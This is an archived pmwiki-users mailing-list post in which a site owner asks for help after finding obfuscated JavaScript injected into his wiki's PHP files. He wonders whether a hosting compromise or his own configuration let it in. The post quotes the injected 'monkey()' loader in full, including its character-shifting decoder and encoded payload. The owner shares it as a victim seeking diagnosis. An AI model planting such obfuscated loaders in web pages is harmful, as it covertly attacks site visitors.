[pmwiki-users] monkey() function?!?

Peter & Melodye Bowers pbowers at pobox.com
Sun Jan 6 17:56:48 CST 2008


I went away on vacation for a week and when I returned I found my wiki site
non-functioning and the following code inserted in several key pmwiki php
files (pmwiki.php, wikiforms.php, extendedmarkup.php, some of my triad skin
php files, etc.):

 

</head>\n<body><script language = "javascript">function monkey(s){

var s1=unescape(s.substr(0,s.length)); var t='';

for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)+7);

document.write(unescape(t));

};

monkey('%35%4C%5C%6B%62%69%6D%19%45%5A%67%60%6E%5A%60%5E%36%20%43%5A%6F%5A%6
C%5C%6B%62%69%6D%20%37%5D%68%5C%6E%66%5E%67%6D%27%70%6B%62%6D%5E%21%6E%67%5E
%6C%5C%5A%69%5E%21%20%1E%2C%3C%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%
1E%2F%2E%1E%2B%29%1E%30%2C%1E%30%2B%1E%2F%2C%1E%2C%3D%1E%2B%2B%1E%2F%31%1E%3
0%2D%1E%30%2D%1E%30%29%1E%2C%3A%1E%2B%3F%1E%2B%3F%1E%2D%32%1E%2C%2D%1E%2D%3C
%1E%2D%3C%1E%2F%2D%1E%2B%3E%1E%2F%2D%1E%2D%2A%1E%2F%30%1E%2D%3F%1E%2E%2D%1E%
2F%31%1E%2B%3E%1E%2F%32%1E%2D%3E%1E%2B%3F%1E%2B%2B%1E%2B%29%1E%30%30%1E%2F%3
2%1E%2F%2D%1E%30%2D%1E%2F%31%1E%2C%3D%1E%2C%29%1E%2B%29%1E%2F%31%1E%2F%2E%1E
%2F%32%1E%2F%30%1E%2F%31%1E%30%2D%1E%2C%3D%1E%2C%29%1E%2C%3E%1E%2C%3C%1E%2B%
3F%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2C%3E%20%22%22%3
4%35%28%6C%5C%6B%62%69%6D%37'); </script>";

 

My first guess is that my hosting company was infiltrated by some sort of
virus that went on the prowl for anything remotely resembling HTML and
inserted this code in hopes it would work (it didn't - it just generated php
errors in every case where I found it).  But I just want to check before I
start pointing fingers at my host (who generously donates the hosting and so
I like to stay on their good side) that there's not something I might have
done thru PHP that would have opened a door to allow someone to make this
type of malicious modification.?  For instance, webadmin allows users to
bypass any kind of FTP security - I've kept that password secure [obviously]
and now disabled that capability, but I'm just wondering if there's not
something else that a newby to this kind of thing might have done
accidentally.  Any tho'ts from you security gurus out there?  Or do I just
need to contact my host and let him know he's been compromised?

 

-Peter



-------------- next part --------------
An HTML attachment was scrubbed...
URL: /pipermail/pmwiki-users/attachments/20080107/f9b95232/attachment.html 


More information about the pmwiki-users mailing list